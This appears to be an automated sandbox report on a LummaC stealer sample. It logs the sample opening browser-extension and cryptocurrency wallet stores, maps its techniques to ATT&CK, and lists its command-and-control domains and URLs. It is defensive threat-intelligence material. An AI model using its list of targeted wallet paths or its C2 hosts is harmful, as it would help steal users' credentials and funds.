Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Directory queried: number of queries: 1001

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	23 Virtualization/Sandbox Evasion	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	23 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	31 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
random.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
random.exe	76%	Virustotal		Browse
random.exe	100%	Avira	TR/ATRAPS.Gen
random.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://pancakedipyps.click:443/apidfmbI	100%	Avira URL Cloud	malware
https://pancakedipyps.click:443/api)	100%	Avira URL Cloud	malware
https://pancakedipyps.click/apiPP	100%	Avira URL Cloud	malware
https://pancakedipyps.click:443/apik	100%	Avira URL Cloud	malware
https://pancakedipyps.click/apiUT	100%	Avira URL Cloud	malware
https://pancakedipyps.click/Z	100%	Avira URL Cloud	malware
https://pancakedipyps.click/la	100%	Avira URL Cloud	malware
https://pancakedipyps.click/bu	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pancakedipyps.click	188.114.97.3	true	false		high

Contacted URLs

Name	Malicious	Reputation
pancakedipyps.click	false	high
cloudewahsj.shop	false	high
noisycuttej.shop	false	high
nearycrepso.shop	false	high
rabidcowse.shop	false	high
wholersorie.shop	false	high
framekgirus.shop	false	high
https://pancakedipyps.click/api	false	high
tirepublicerj.shop	false	high
abruptyopsn.shop	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://pancakedipyps.click:443/apidfmbI	random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://pancakedipyps.click/apiPP	random.exe, 00000003.00000002.1797182496.0000000000BE4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.6.dr	false		high
https://pancakedipyps.click:443/apik	random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://pancakedipyps.click:443/api)	random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://pancakedipyps.click/apiUT	random.exe, 00000003.00000002.1797182496.0000000000BE4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://pancakedipyps.click/la	random.exe, 00000003.00000002.1797182496.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://pancakedipyps.click/Z	random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://pancakedipyps.click/bu	random.exe, 00000003.00000002.1797182496.0000000000BCD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://pancakedipyps.click/	random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pancakedipyps.click/pi	random.exe, 00000003.00000002.1797182496.0000000000BCD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pancakedipyps.click:443/api	random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	pancakedipyps.click	European Union		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585859
Start date and time:	2025-01-08 11:46:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	random.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 37 Number of non-executed functions: 106
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.190.159.23, 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:46:56	API Interceptor	7x Sleep call for process: random.exe modified
05:47:08	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	GTA5-elamigos.exe	Get hash	malicious	Esquele Stealer	Browse	/api/get/dll
	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	www.uzshou.world/ricr/
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/8rr3/
	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/8rr3/
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pancakedipyps.click	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	vVJvxAfBDM.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.23.76
	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.209.202
	J18uCKmoAw.exe	Get hash	malicious	LummaC	Browse	172.67.209.202
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	172.67.209.202
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.209.202
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.67.209.202
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Vidar, Xmrig	Browse	104.21.23.76
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRAT	Browse	104.21.23.76
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	104.21.23.76

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Q1 Statements.html	Get hash	malicious	Unknown	Browse	104.18.95.41
	174.exe	Get hash	malicious	Xmrig	Browse	104.21.95.99
	https://www.dollartip.info/unsubscribe/?d=mdlandrec.net	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://wetransfert-devis-factgfd.mystrikingly.com/	Get hash	malicious	Unknown	Browse	104.17.25.14
	spreadmalware.exe	Get hash	malicious	XWorm	Browse	104.21.32.1
	mail (4).eml	Get hash	malicious	Unknown	Browse	104.18.1.150
	https://www.dollartip.info/neuro	Get hash	malicious	Unknown	Browse	104.18.36.7
	Subscription_Renewal_Invoice_2025_HKVXTC.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	xHj1N8ylIf.exe	Get hash	malicious	LummaC	Browse	104.21.80.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	asd.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	wRhEMj1swo.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	xHj1N8ylIf.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	GR7ShhQTKE.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	ab89jay39E.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	wRhEMj1swo.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	[UPD]Intel_Unit.2.1.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	socolo.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Installer.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3

Dropped Files

⊘No context

Created / dropped Files

